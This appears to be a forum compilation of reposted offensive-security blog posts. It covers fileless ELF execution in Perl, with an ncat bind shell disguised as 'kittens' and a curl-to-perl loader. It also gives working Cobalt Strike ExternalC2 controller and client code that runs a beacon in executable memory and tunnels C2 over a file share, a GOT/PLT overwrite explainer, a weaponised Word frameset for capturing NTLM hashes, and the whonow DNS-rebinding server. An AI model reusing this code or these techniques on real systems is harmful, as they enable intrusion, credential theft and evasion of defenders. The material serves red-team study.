print $FH pack q/H*/, q/0600000004000000400000000000000040004000000000004000400000000000/ or die qq/write: $!/; Exceuting those puts our ELF binary into memory. Time to run it. Optional: fork(2) Ok, fork(2) is isn’t actually a system call; it’s really a libc function which does all sorts of stuff under the hood. Perl’s fork() is functionally identical to libc’s as far as process-making goes: once it’s called, there are now two nearly identical processes running (of which one, usually the child, often finds itself calling exec(2)). We don’t actually have to spawn a new process to run our ELF binary, but if we want to do more than just run it and exit (say, run it multiple times), it’s the way to go. In general, using fork() to spawn multiple children looks something like: while ($keep_going) { my $pid = fork(); if (-1 == $pid) { # Error die "fork: $!"; } if (0 == $pid) { # Child # Do child things here exit 0; } } Another handy use of fork(), especially when done twice with a call to setsid(2) in the middle, is to spawn a disassociated child and let the parent terminate: # Spawn child my $pid = fork(); if (-1 == $pid) { # Error die "fork1: $!"; } if (0 != $pid) { # Parent terminates exit 0; } # In the child, become session leader if (-1 == syscall(112)) { die "setsid: $!"; } # Spawn grandchild $pid = fork(); if (-1 == $pid) { # Error die "fork2: $!"; } if (0 != $pid) { # Child terminates exit 0; } # In the grandchild here, do grandchild things We can now have our ELF process run multiple times or in a separate process. Let’s do it. execve(2) Linux process creation is a funny thing. Ever since the early days of Unix, process creation has been a combination of not much more than duplicating a current process and swapping out the new clone’s program with what should be running, and on Linux it’s no different. The execve(2) system call does the second bit: it changes one running program into another. Perl gives us exec(), which does more or less the same, albiet with easier syntax. We pass to exec() two things: the file containing the program to execute (i.e. our in-memory ELF binary) and a list of arguments, of which the first element is usually taken as the process name. Usually, the file and the process name are the same, but since it’d look bad to have /proc/<PID>/fd/3 in a process listing, we’ll name our process something else. The syntax for calling exec() is a bit odd, and explained much better in the documentation. For now, we’ll take it on faith that the file is passed as a string in curly braces and there follows a comma-separated list of process arguments. We can use the variable $$ to get the pid of our own Perl process. For the sake of clarity, the following assumes we’ve put ncat in memory, but in practice, it’s better to use something which takes arguments that don’t look like a backdoor. exec {"/proc/$$/fd/$fd"} "kittens", "-kvl", "4444", "-e", "/bin/sh" or die "exec: $!"; The new process won’t have the anonymous file open as a symlink in /proc/<PID>/fd, but the anonymous file will be visible as the/proc/<PID>/exe symlink, which normally points to the file containing the program which is being executed by the process. We’ve now got an ELF binary running without putting anything on disk or even in the filesystem. Scripting it It’s not likely we’ll have the luxury of being able to sit on target and do all of the above by hand. Instead, we’ll pipe the script (elfload.pl in the example below) via SSH to Perl’s stdin, and use a bit of shell trickery to keep perl with no arguments from showing up in the process list: cat ./elfload.pl | ssh user@target /bin/bash -c '"exec -a /sbin/iscsid perl"' This will run Perl, renamed in the process list to /sbin/iscsid with no arguments. When not given a script or a bit of code with -e, Perl expects a script on stdin, so we send the script to perl stdin via our local SSH client. The end result is our script is run without touching disk at all. Without creds but with access to the target (i.e. after exploiting on), in most cases we can probably use the devopsy curl http://server/elfload.pl | perl trick (or intercept someone doing the trick for us). As long as the script makes it to Perl’s stdin and Perl gets an EOF when the script’s all read, it doesn’t particularly matter how it gets there. Artifacts Once running, the only real difference between a program running from an anonymous file and a program running from a normal file is the /proc/<PID>/exe symlink. If something’s monitoring system calls (e.g. someone’s running strace -f on sshd), the memfd_create(2) calls will stick out, as will passing paths in /proc/<PID>/fd to execve(2). Other than that, there’s very little evidence anything is wrong. Demo To see this in action, have a look at this asciicast. TL;DR In C (translate to your non-disk-touching language of choice): fd = memfd_create("", MFD_CLOEXEC); write(pid, elfbuffer, elfbuffer_len); asprintf(p, "/proc/self/fd/%i", fd); execl(p, "kittens", "arg1", "arg2", NULL); Updated: March 31, 2018 Sursa: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html
-
Exploring Cobalt Strike's ExternalC2 framework Posted on 30th March 2018 As many testers will know, achieving C2 communication can sometimes be a pain. Whether because of egress firewall rules or process restrictions, the simple days of reverse shells and reverse HTTP C2 channels are quickly coming to an end. OK, maybe I exaggerated that a bit, but it's certainly becoming harder. So, I wanted to look at some alternate routes to achieve C2 communication and with this, I came across Cobalt Strike’s ExternalC2 framework. ExternalC2 ExternalC2 is a specification/framework introduced by Cobalt Strike, which allows hackers to extend the default HTTP(S)/DNS/SMB C2 communication channels offered. The full specification can be downloaded here. Essentially this works by allowing the user to develop a number of components: Third-Party Controller - Responsible for creating a connection to the Cobalt Strike TeamServer, and communicating with a Third-Party Client on the target host using a custom C2 channel. Third-Party Client - Responsible for communicating with the Third-Party Controller using a custom C2 channel, and relaying commands to the SMB Beacon. SMB Beacon - The standard beacon which will be executed on the victim host. Using the diagram from CS's documentation, we can see just how this all fits together: Here we can see that our custom C2 channel is transmitted between the Third-Party Controller and the Third-Party Client, both of which we can develop and control. Now, before we roll up our sleeves, we need to understand how to communicate with the Team Server ExternalC2 interface. First, we need to tell Cobalt Strike to start ExternalC2. This is done with an aggressor script calling the externalc2_start function, and passing a port. Once the ExternalC2 service is up and running, we need to communicate using a custom protocol. The protocol is actually pretty straight forward, consisting of a 4 byte little-endian length field, and a blob of data, for example: To begin communication, our Third-Party Controller opens a connection to TeamServer and sends a number of options: arch - The architecture of the beacon to be used (x86 or x64). pipename - The name of the pipe used to communicate with the beacon. block - Time in milliseconds that TeamServer will block between tasks. Once each option has been sent, the Third-Party Controller sends a go command. This starts the ExternalC2 communication, and causes a beacon to be generated and sent. The Third-Party Controller then relays this SMB beacon payload to the Third-Party Client, which then needs to spawn the SMB beacon. Once the SMB beacon has been spawned on the victim host, we need to establish a connection to enable passing of commands. This is done over a named pipe, and the protocol used between the Third-Party Client and the SMB Beacon is exactly the same as between the Third-Party Client and Third-Party Controller... a 4 byte little-endian length field, and trailing data. OK, enough theory, let’s create a “Hello World” example to simply relay the communication over a network. Hello World ExternalC2 Example For this example, we will be using Python on the server side for our Third-Party Controller, and C for our client side Third-Party Client. First, we need our aggressor script to tell Cobalt Strike to enable ExternalC2: # start the External C2 server and bind to 0.0.0.0:2222 externalc2_start("0.0.0.0", 2222); This opens up ExternalC2 on 0.0.0.0:2222. Now that ExternalC2 is up and running, we can create our Third-Party Controller. Let’s first establish our connection to the TeamServer ExternalC2 interface: _socketTS = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP) _socketTS.connect(("127.0.0.1", 2222)) Once established, we need to send over our options. We will create a few quick helper function to allow us to prefix our 4 byte length without manually crafting it each time: def encodeFrame(data): return struct.pack("<I", len(data)) + data def sendToTS(data): _socketTS.sendall(encodeFrame(data)) Now we can use these helper functions to send over our options: # Send out config options sendToTS("arch=x86") sendToTS(“pipename=xpntest") sendToTS("block=500") sendToTS("go") Now that Cobalt Strike knows we want an x86 SMB Beacon, we need to receive data. Again let’s create a few helper functions to handle the decoding of packets rather than manually decoding each time: def decodeFrame(data): len = struct.unpack("<I", data[0:3]) body = data[4:] return (len, body) def recvFromTS(): data = "" _len = _socketTS.recv(4) l = struct.unpack("<I",_len)[0] while len(data) < l: data += _socketTS.recv(l - len(data)) return data This allows us to receive raw data with: data = recvFromTS() Next, we need to allow our Third-Party Client to connect to us using a C2 protocol of our choice. For now, we are simply going to use the same 4 byte length packet format for our C2 channel protocol. So first, we need a socket for the Third-Party Client to connect to: _socketBeacon = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP) _socketBeacon.bind(("0.0.0.0", 8081)) _socketBeacon.listen(1) _socketClient = _socketBeacon.accept()[0] Then, once a connection is received, we enter our recv/send loop where we receive data from the victim host, forward this onto Cobalt Strike, and receive data from Cobalt Strike, forwarding this to our victim host: while(True): print "Sending %d bytes to beacon" % len(data) sendToBeacon(data) data = recvFromBeacon() print "Received %d bytes from beacon" % len(data) print "Sending %d bytes to TS" % len(data) sendToTS(data) data = recvFromTS() print "Received %d bytes from TS" % len(data) Our finished example can be found here. Now we have a working controller, we need to create our Third-Party Client. To make things a bit easier, we will use win32 and C for this, giving us access to Windows native API. Let’s start with a few helper functions. First, we need to connect to the Third-Party Controller. Here we will simply use WinSock2 to establish a TCP connection to the controller: // Creates a new C2 controller connection for relaying commands SOCKET createC2Socket(const char *addr, WORD port) { WSADATA wsd; SOCKET sd; SOCKADDR_IN sin; WSAStartup(0x0202, &wsd); memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_port = htons(port); sin.sin_addr.S_un.S_addr = inet_addr(addr); sd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); connect(sd, (SOCKADDR*)&sin, sizeof(sin)); return sd; } Next, we need a way to receive data. This is similar to what we saw in our Python code, with our length prefix being used as an indicator as to how many data bytes we are receiving: // Receives data from our C2 controller to be relayed to the injected beacon char *recvData(SOCKET sd, DWORD *len) { char *buffer; DWORD bytesReceived = 0, totalLen = 0; *len = 0; recv(sd, (char *)len, 4, 0); buffer = (char *)malloc(*len); if (buffer == NULL) return NULL; while (totalLen < *len) { bytesReceived = recv(sd, buffer + totalLen, *len - totalLen, 0); totalLen += bytesReceived; } return buffer; } Similar, we need a way to return data over our C2 channel to the Controller: // Sends data to our C2 controller received from our injected beacon void sendData(SOCKET sd, const char *data, DWORD len) { char *buffer = (char *)malloc(len + 4); if (buffer == NULL): return; DWORD bytesWritten = 0, totalLen = 0; *(DWORD *)buffer = len; memcpy(buffer + 4, data, len); while (totalLen < len + 4) { bytesWritten = send(sd, buffer + totalLen, len + 4 - totalLen, 0); totalLen += bytesWritten; } free(buffer); } Now we have the ability to communicate with our Controller, the first thing we want to do is to receive the beacon payload. This will be a raw x86 or x64 payload (depending on the options passed by the Third-Party Controller to Cobalt Strike), and is expected to be copied into memory before being executed. For example, let’s grab the beacon payload: // Create a connection back to our C2 controller SOCKET c2socket = createC2Socket("192.168.1.65", 8081); payloadData = recvData(c2socket, &payloadLen); And then for the purposes of this demo, we will use the Win32 VirtualAlloc function to allocate an executable range of memory, and CreateThread to execute the code: HANDLE threadHandle; DWORD threadId = 0; char *alloc = (char *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (alloc == NULL) return; memcpy(alloc, payload, len); threadHandle = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)alloc, NULL, 0, &threadId); Once the SMB Beacon is up and running, we need to connect to its named pipe. To do this, we will just repeatedly attempt to connect to our \\.\pipe\xpntest pipe (remember, this pipename was passed as an option earlier on, and will be used by the SMB Beacon to receive commands): // Loop until the pipe is up and ready to use while (beaconPipe == INVALID_HANDLE_VALUE) { // Create our IPC pipe for talking to the C2 beacon Sleep(500); beaconPipe = connectBeaconPipe("\\\\.\\pipe\\xpntest"); } And then, once we have a connection, we can continue with our send/recv loop: while (true) { // Start the pipe dance payloadData = recvFromBeacon(beaconPipe, &payloadLen); if (payloadLen == 0) break; sendData(c2socket, payloadData, payloadLen); free(payloadData); payloadData = recvData(c2socket, &payloadLen); if (payloadLen == 0) break; sendToBeacon(beaconPipe, payloadData, payloadLen); free(payloadData); } And that’s it, we have the basics of our ExternalC2 service set up. The full code for the Third-Party Client can be found here. Now, onto something a bit more interesting. Transfer C2 over file Let’s recap on what it is we control when attempting to create a custom C2 protocol: From here, we can see that the data transfer between the Third-Party Controller and Third-Party Client is where we get to have some fun. Taking our previous "Hello World" example, let’s attempt to port this into something a bit more interesting, transferring data over a file read/write. Why would we want to do this? Well, let’s say we are in a Windows domain environment and compromise a machine with very limited outbound access. One thing that is permitted however is access to a file share... see where I’m going with this By writing C2 data from a machine with access to our C2 server into a file on the share, and reading the data from the firewall’d machine, we have a way to run our Cobalt Strike beacon. Let’s think about just how this will look: Here we have actually introduced an additional element, which essentially tunnels data into and out of the file, and communicates with the Third Party Controller. Again, for the purposes of this example, our communication between the Third-Party Controller and the "Internet Connected Host" will use the familiar 4 byte length prefix protocol, so there is no reason to modify our existing Python Third-Party Controller. What we will do however, is split our previous Third-Party Client into 2 parts. One which is responsible for running on the "Internet Connected Host", receiving data from the Third-Party Controller and writing this into a file. The second, which runs from the "Restricted Host", reads data from the file, spawns the SMB Beacon, and passes data to this beacon. I won't go over the elements we covered above, but I'll show one way the file transfer can be achieved. First, we need to create the file we will be communicating over. For this we will just use CreateFileA, however we must ensure that the FILE_SHARE_READ and FILE_SHARE_WRITEoptions are provided. This will allow both sides of the Third-Party Client to read and write to the file simultaneously: HANDLE openC2FileServer(const char *filepath) { HANDLE handle; handle = CreateFileA(filepath, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (handle == INVALID_HANDLE_VALUE) printf("Error opening file: %x\n", GetLastError()); return handle; } Next, we need a way to serialising our C2 data into the file, as well as indicating which of the 2 clients should be processing data at any time. To do this, a simple header can be used, for example: struct file_c2_header { DWORD id; DWORD len; }; The idea is that we simply poll on the id field, which acts as a signal to each Third-Party Client of who should be reading and who writing data. Putting together our file read and write helpers, we have something that looks like this: void writeC2File(HANDLE c2File, const char *data, DWORD len, int id) { char *fileBytes = NULL; DWORD bytesWritten = 0; fileBytes = (char *)malloc(8 + len); if (fileBytes == NULL) return; // Add our file header *(DWORD *)fileBytes = id; *(DWORD *)(fileBytes+4) = len; memcpy(fileBytes + 8, data, len); // Make sure we are at the beginning of the file SetFilePointer(c2File, 0, 0, FILE_BEGIN); // Write our C2 data in WriteFile(c2File, fileBytes, 8 + len, &bytesWritten, NULL); printf("[*] Wrote %d bytes\n", bytesWritten); } char *readC2File(HANDLE c2File, DWORD *len, int expect) { char header[8]; DWORD bytesRead = 0; char *fileBytes = NULL; memset(header, 0xFF, sizeof(header)); // Poll until we have our expected id in the header while (*(DWORD *)header != expect) { SetFilePointer(c2File, 0, 0, FILE_BEGIN); ReadFile(c2File, header, 8, &bytesRead, NULL); Sleep(100); } // Read out the expected length from the header *len = *(DWORD *)(header + 4); fileBytes = (char *)malloc(*len); if (fileBytes == NULL) return NULL; // Finally, read out our C2 data ReadFile(c2File, fileBytes, *len, &bytesRead, NULL); printf("[*] Read %d bytes\n", bytesRead); return fileBytes; } Here we see that we are adding our header to the file, and read/writing C2 data into the file respectively. And that is pretty much all there is to it. All that is left to do is implement our recv/write/read/send loop and we have C2 operating across a file transfer. The full code for the above Third-Party Controller can be found here. Let's see this in action: If you are interested in learning more about ExternalC2, there are a number of useful resources which can be found over at the Cobalt Strike ExternalC2 help page, https://www.cobaltstrike.com/help-externalc2. Sursa: https://blog.xpnsec.com/exploring-cobalt-strikes-externalc2-framework/
-
- 2
-
-
-
GOT and PLT for pwning. 19 Mar 2017 in Security Tags: Pwning, Linux So, during the recent 0CTF, one of my teammates was asking me about RELRO and the GOT and the PLT and all of the ELF sections involved. I realized that though I knew the general concepts, I didn’t know as much as I should, so I did some research to find out some more. This is documenting the research (and hoping it’s useful for others). All of the examples below will be on an x86 Linux platform, but the concepts all apply equally to x86-64. (And, I assume, other architectures on Linux, as the concepts are related to ELF linking and glibc, but I haven’t checked.) High-Level Introduction So what is all of this nonsense about? Well, there’s two types of binaries on any system: statically linked and dynamically linked. Statically linked binaries are self-contained, containing all of the code necessary for them to run within the single file, and do not depend on any external libraries. Dynamically linked binaries (which are the default when you run gcc and most other compilers) do not include a lot of functions, but rely on system libraries to provide a portion of the functionality. For example, when your binary uses printf to print some data, the actual implementation of printf is part of the system C library. Typically, on current GNU/Linux systems, this is provided by libc.so.6, which is the name of the current GNU Libc library. In order to locate these functions, your program needs to know the address of printf to call it. While this could be written into the raw binary at compile time, there’s some problems with that strategy: Each time the library changes, the addresses of the functions within the library change, when libc is upgraded, you’d need to rebuild every binary on your system. While this might appeal to Gentoo users, the rest of us would find it an upgrade challenge to replace every binary every time libc received an update. Modern systems using ASLR load libraries at different locations on each program invocation. Hardcoding addresses would render this impossible. Consequently, a strategy was developed to allow looking up all of these addresses when the program was run and providing a mechanism to call these functions from libraries. This is known as relocation, and the hard work of doing this at runtime is performed by the linker, aka ld-linux.so. (Note that every dynamically linked program will be linked against the linker, this is actually set in a special ELF section called .interp.) The linker is actually run before any code from your program or libc, but this is completely abstracted from the user by the Linux kernel. Relocations Looking at an ELF file, you will discover that it has a number of sections, and it turns out that relocations require several of these sections. I’ll start by defining the sections, then discuss how they’re used in practice. .got This is the GOT, or Global Offset Table. This is the actual table of offsets as filled in by the linker for external symbols. .plt This is the PLT, or Procedure Linkage Table. These are stubs that look up the addresses in the .got.plt section, and either jump to the right address, or trigger the code in the linker to look up the address. (If the address has not been filled in to .got.plt yet.) .got.plt This is the GOT for the PLT. It contains the target addresses (after they have been looked up) or an address back in the .plt to trigger the lookup. Classically, this data was part of the .got section. .plt.got It seems like they wanted every combination of PLT and GOT! This just seems to contain code to jump to the first entry of the .got. I’m not actually sure what uses this. (If you know, please reach out and let me know! In testing a couple of programs, this code is not hit, but maybe there’s some obscure case for this.) TL;DR: Those starting with .plt contain stubs to jump to the target, those starting with .got are tables of the target addresses. Let’s walk through the way a relocation is used in a typical binary. We’ll include two libc functions: puts and exit and show the state of the various sections as we go along. Here’s our source: 1 2 3 4 5 6 7 8 9 // Build with: gcc -m32 -no-pie -g -o plt plt.c #include <stdio.h> #include <stdlib.h> int main(int argc, char **argv) { puts("Hello world!"); exit(0); } Let’s examine the section headers: 1 2 3 4 5 6 7 8 9 There are 36 section headers, starting at offset 0x1fb4: Section Headers: [Nr] Name Type Addr Off Size ES Flg Lk Inf Al [12] .plt PROGBITS 080482f0 0002f0 000040 04 AX 0 0 16 [13] .plt.got PROGBITS 08048330 000330 000008 00 AX 0 0 8 [14] .text PROGBITS 08048340 000340 0001a2 00 AX 0 0 16 [23] .got PROGBITS 08049ffc 000ffc 000004 04 WA 0 0 4 [24] .got.plt PROGBITS 0804a000 001000 000018 04 WA 0 0 4 I’ve left only the sections I’ll be talking about, the full program is 36 sections! So let’s walk through this process with the use of GDB. (I’m using the fantastic GDB environment provided by pwndbg, so some UI elements might look a bit different from vanilla GDB.) We’ll load up our binary and set a breakpoint just before puts gets called and then examine the flow step-by-step: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 pwndbg> disass main Dump of assembler code for function main: 0x0804843b <+0>: lea ecx,[esp+0x4] 0x0804843f <+4>: and esp,0xfffffff0 0x08048442 <+7>: push DWORD PTR [ecx-0x4] 0x08048445 <+10>: push ebp 0x08048446 <+11>: mov ebp,esp 0x08048448 <+13>: push ebx 0x08048449 <+14>: push ecx 0x0804844a <+15>: call 0x8048370 <__x86.get_pc_thunk.bx> 0x0804844f <+20>: add ebx,0x1bb1 0x08048455 <+26>: sub esp,0xc 0x08048458 <+29>: lea eax,[ebx-0x1b00] 0x0804845e <+35>: push eax 0x0804845f <+36>: call 0x8048300 <puts@plt> 0x08048464 <+41>: add esp,0x10 0x08048467 <+44>: sub esp,0xc 0x0804846a <+47>: push 0x0 0x0804846c <+49>: call 0x8048310 <exit@plt> End of assembler dump. pwndbg> break *0x0804845f Breakpoint 1 at 0x804845f: file plt.c, line 7. pwndbg> r Breakpoint *0x0804845f pwndbg> x/i $pc => 0x804845f <main+36>: call 0x8048300 <puts@plt> Ok, we’re about to call puts. Note that the address being called is local to our binary, in the .pltsection, hence the special symbol name of puts@plt. Let’s step through the process until we get to the actual puts function. 1 2 3 pwndbg> si pwndbg> x/i $pc => 0x8048300 <puts@plt>: jmp DWORD PTR ds:0x804a00c We’re in the PLT, and we see that we’re performing a jmp, but this is not a typical jmp. This is what a jmp to a function pointer would look like. The processor will dereference the pointer, then jump to resulting address. Let’s check the dereference and follow the jmp. Note that the pointer is in the .got.plt section as we described above. 1 2 3 4 5 6 7 pwndbg> x/wx 0x804a00c 0x804a00c: 0x08048306 pwndbg> si 0x08048306 in puts@plt () pwndbg> x/2i $pc => 0x8048306 <puts@plt+6>: push 0x0 0x804830b <puts@plt+11>: jmp 0x80482f0 Well, that’s weird. We’ve just jumped to the next instruction! Why has this occurred? Well, it turns out that because we haven’t called puts before, we need to trigger the first lookup. It pushes the slot number (0x0) on the stack, then calls the routine to lookup the symbol name. This happens to be the beginning of the .plt section. What does this stub do? Let’s find out. 1 2 3 4 5 pwndbg> si pwndbg> si pwndbg> x/2i $pc => 0x80482f0: push DWORD PTR ds:0x804a004 0x80482f6: jmp DWORD PTR ds:0x804a008 Now, we push the value of the second entry in .got.plt, then jump to the address stored in the third entry. Let’s examine those values and carry on. 1 2 pwndbg> x/2wx 0x804a004 0x804a004: 0xf7ffd918 0xf7fedf40 Wait, where is that pointing? It turns out the first one points into the data segment of ld.so, and the 2nd into the executable area: 1 2 3 0xf7fd9000 0xf7ffb000 r-xp 22000 0 /lib/i386-linux-gnu/ld-2.24.so 0xf7ffc000 0xf7ffd000 r--p 1000 22000 /lib/i386-linux-gnu/ld-2.24.so 0xf7ffd000 0xf7ffe000 rw-p 1000 23000 /lib/i386-linux-gnu/ld-2.24.so Ah, finally, we’re asking for the information for the puts symbol! These two addresses in the .got.plt section are populated by the linker/loader (ld.so) at the time it is loading the binary. So, I’m going to treat what happens in ld.so as a black box. I encourage you to look into it, but exactly how it looks up the symbols is a little bit too low level for this post. Suffice it to say that eventually we will reach a ret from the ld.so code that resolves the symbol. 1 2 3 4 5 pwndbg> x/i $pc => 0xf7fedf5b: ret 0xc pwndbg> ni pwndbg> info symbol $pc puts in section .text of /lib/i386-linux-gnu/libc.so.6 Look at that, we find ourselves at puts, exactly where we’d like to be. Let’s see how our stack looks at this point: 1 2 3 4 pwndbg> x/4wx $esp 0xffffcc2c: 0x08048464 0x08048500 0xffffccf4 0xffffccfc pwndbg> x/s *(int *)($esp+4) 0x8048500: "Hello world!" Absolutely no trace of the trip through .plt, ld.so, or anything but what you’d expect from a direct call to puts. Unfortunately, this seemed like a long trip to get from main to puts. Do we have to go through that every time? Fortunately, no. Let’s look at our entry in .got.plt again, disassembling puts@plt to verify the address first: 1 2 3 4 5 6 7 8 9 10 pwndbg> disass 'puts@plt' Dump of assembler code for function puts@plt: 0x08048300 <+0>: jmp DWORD PTR ds:0x804a00c 0x08048306 <+6>: push 0x0 0x0804830b <+11>: jmp 0x80482f0 End of assembler dump. pwndbg> x/wx 0x804a00c 0x804a00c: 0xf7e4b870 pwndbg> info symbol 0xf7e4b870 puts in section .text of /lib/i386-linux-gnu/libc.so.6 So now, a call puts@plt results in a immediate jmp to the address of puts as loaded from libc. At this point, the overhead of the relocation is one extra jmp. (Ok, and dereferencing the pointer which might cause a cache load, but I suspect the GOT is very often in L1 or at least L2, so very little overhead.) How did the .got.plt get updated? That’s why a pointer to the beginning of the GOT was passed as an argument back to ld.so. ld.so did magic and inserted the proper address in the GOT to replace the previous address which pointed to the next instruction in the PLT. Pwning Relocations Alright, well now that we think we know how this all works, how can I, as a pwner, make use of this? Well, pwning usually involves taking control of the flow of execution of a program. Let’s look at the permissions of the sections we’ve been dealing with: 1 2 3 4 5 6 7 8 9 10 Section Headers: [Nr] Name Type Addr Off Size ES Flg Lk Inf Al [12] .plt PROGBITS 080482f0 0002f0 000040 04 AX 0 0 16 [13] .plt.got PROGBITS 08048330 000330 000008 00 AX 0 0 8 [14] .text PROGBITS 08048340 000340 0001a2 00 AX 0 0 16 [23] .got PROGBITS 08049ffc 000ffc 000004 04 WA 0 0 4 [24] .got.plt PROGBITS 0804a000 001000 000018 04 WA 0 0 4 Key to Flags: W (write), A (alloc), X (execute), M (merge), S (strings), I (info), We’ll note that, as is typical for a system supporting NX, no section has both the Write and eXecute flags enabled. So we won’t be overwriting any executable sections, but we should be used to that. On the other hand, the .got.plt section is basically a giant array of function pointers! Maybe we could overwrite one of these and control execution from there. It turns out this is quite a common technique, as described in a 2001 paper from team teso. (Hey, I never said the technique was new.) Essentially, any memory corruption primitive that will let you write to an arbitrary (attacker-controlled) address will allow you to overwrite a GOT entry. Mitigations So, since this exploit technique has been known for so long, surely someone has done something about it, right? Well, it turns out yes, there’s been a mitigation since 2004. Enter relocations read-only, or RELRO. It in fact has two levels of protection: partial and full RELRO. Partial RELRO (enabled with -Wl,-z,relro): Maps the .got section as read-only (but not .got.plt) Rearranges sections to reduce the likelihood of global variables overflowing into control structures. Full RELRO (enabled with -Wl,-z,relro,-z,now): Does the steps of Partial RELRO, plus: Causes the linker to resolve all symbols at link time (before starting execution) and then remove write permissions from .got. .got.plt is merged into .got with full RELRO, so you won’t see this section name. Only full RELRO protects against overwriting function pointers in .got.plt. It works by causing the linker to immediately look up every symbol in the PLT and update the addresses, then mprotect the page to no longer be writable. Summary The .got.plt is an attractive target for printf format string exploitation and other arbitrary write exploits, especially when your target binary lacks PIE, causing the .got.plt to be loaded at a fixed address. Enabling Full RELRO protects against these attacks by preventing writing to the GOT. References ELF Format Reference Examining Dynamic Linking with GDB RELRO - A (not so well known) Memory Corruption Mitigation Technique What is the symbol and the global offset table? How the ELF ruined Christmas Sursa: https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html
-
Microsoft Office – NTLM Hashes via Frameset December 18, 2017 Microsoft office documents are playing a vital role towards red team assessments as usually they are used to gain some initial foothold on the client’s internal network. Staying under the radar is a key element as well and this can only be achieved by abusing legitimate functionality of Windows or of a trusted application such as Microsoft office. Historically Microsoft Word was used as an HTML editor. This means that it can support HTML elements such as framesets. It is therefore possible to link a Microsoft Word document with a UNC path and combing this with responder in order to capture NTLM hashes externally. Word documents with the docx extension are actually a zip file which contains various XML documents. These XML files are controlling the theme, the fonts, the settings of the document and the web settings. Using 7-zip it is possible to open that archive in order to examine these files: Docx Contents The word folder contains a file which is called webSettings.xml. This file needs to be modified in order to include the frameset. webSettings File Adding the following code will create a link with another file. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 <w:frameset> <w:framesetSplitbar> <w:w w:val="60"/> <w:color w:val="auto"/> <w:noBorder/> </w:framesetSplitbar> <w:frameset> <w:frame> <w:name w:val="3"/> <w:sourceFileName r:id="rId1"/> <w:linkedToFile/> </w:frame> </w:frameset> </w:frameset> webSettings XML – Frameset The new webSettings.xml file which contains the frameset needs to be added back to the archive so the previous version will be overwritten. webSettings with Frameset – Adding new version to archive A new file (webSettings.xml.rels) must be created in order to contain the relationship ID (rId1) the UNC path and the TargetMode if it is external or internal. 1 2 3 4 5 <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"> <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\\192.168.1.169\Microsoft_Office_Updates.docx" TargetMode="External"/> </Relationships> webSettings XML Relationship File – Contents The _rels directory contains the associated relationships of the document in terms of fonts, styles, themes, settings etc. Planting the new file in that directory will finalize the relationship link which has been created previously via the frameset. webSettings XML rels Now that the Word document has been weaponized to connect to a UNC path over the Internet responder can be configured in order to capture the NTLM hashes. 1 responder -I wlan0 -e 192.168.1.169 -b -A -v Responder Configuration Once the target user open the word document it will try to connect to a UNC path. Word – Connect to UNC Path via Frameset Responder will retrieve the NTLMv2 hash of the user. Responder – NTLMv2 Hash via Frameset Alternatively Metasploit Framework can be used instead of Responder in order to capture the password hash. 1 auxiliary/server/capture/smb Metasploit – SMB Capture Module NTLMv2 hashes will be captured in Metasploit upon opening the document. Metasploit SMB Capture Module – NTLMv2 Hash via Frameset Conclusion This technique can allow the red team to grab domain password hashes from users which can lead to internal network access if 2-factor authentication for VPN access is not enabled and there is a weak password policy. Additionally if the target user is an elevated account such as local administrator or domain admin then this method can be combined with SMB relay in order to obtain a Meterpreter session. Sursa: https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/
-
- 1
-
-
Whonow DNS Server A malicious DNS server for executing DNS Rebinding attacks on the fly. whonow lets you specify DNS responses and rebind rules dynamically using domain requests themselves. # respond to DNS queries for this domain with 52.23.194.42 the first time # it is requested and then 192.168.1.1 every time after that A.52.23.194.42.1time.192.168.1.1.forever.rebind.network # respond first with 52.23.194.42, then 192.168.1.1 the next five times, # and then start all over again (1, then 5, forever...) A.52.23.194.42.1time.192.168.1.1.5times.repeat.rebind.network What's great about dynamic DNS Rebinding rules is that you don't have to spin up your own malicious DNS server to start exploiting the browser's Same-origin policy. Instead, everyone can share the same public whonow server. Note: You should include UUIDs (e.g. a06a5856-1fff-4415-9aa2-823230b05826) as a subdomain in each DNS lookup to a whonow server. These have been omitted from examples in this README for brevity, but assume requests to *.rebind.network should be *.a06a5856-1fff-4415-9aa2-823230b05826.rebind.network. See the Gotchas section for more info as to why. Subdomains = Rebind Rules The beauty of whonow is that you can define the behavior of DNS responses via subdomains in the domain name itself. Using only a few simple keywords: A, (n)times, forever, and repeat, you can define complex and powerful DNS behavior. Anatomy of a whonow request A.<ip-address>.<rule>[.<ip-address>.<rule>[.<ip-address>.<rule>]][.uuid/random-string].example.com A: The type of DNS request. Currently only A records are supported, but AAAA should be coming soon. <ip-address>: an ipv4 (ipv6 coming soon) address with each octet seprated by a period (e.g. 192.168.1.1. <rule>: One of three rules (n)time: The number of times the DNS server should reply with the previous IP address. Accepts both plural and singular strings (e.g. 1time, 3times, 5000times) forever: Respond with the previous IP address forever. repeat: Repeat the entire set of rules starting from the beginning. [uuid/random-string]: A random string to keep DNS Rebind attacks against the same IP addresses separate from each other. See Gotchas for more info. example.com: A domain name you have pointing to a whonow nameserver, like the publicly available rebind.networkwhonow instance. Rules can be chained together to form complex response behavior. Examples # always respond with 192.168.1.1. This isn't really DNS rebinding # but it still works A.192.168.1.1.forever.rebind.network # alternate between localhost and 10.0.0.1 forever A.127.0.0.1.1time.10.0.0.1.1time.repeat.rebind.network # first respond with 192.168.1.1 then 192.168.1.2. Now respond 192.168.1.3 forever. A.192.168.1.1.1time.192.168.1.2.2times.192.168.1.3.forever.rebind.network # respond with 52.23.194.42 the first time, then whatever `whonow --default-address` # is set to forever after that (default: 127.0.0.1) A.52.23.194.42.1time.rebind.network Limitations Each label [subdomain] may contain 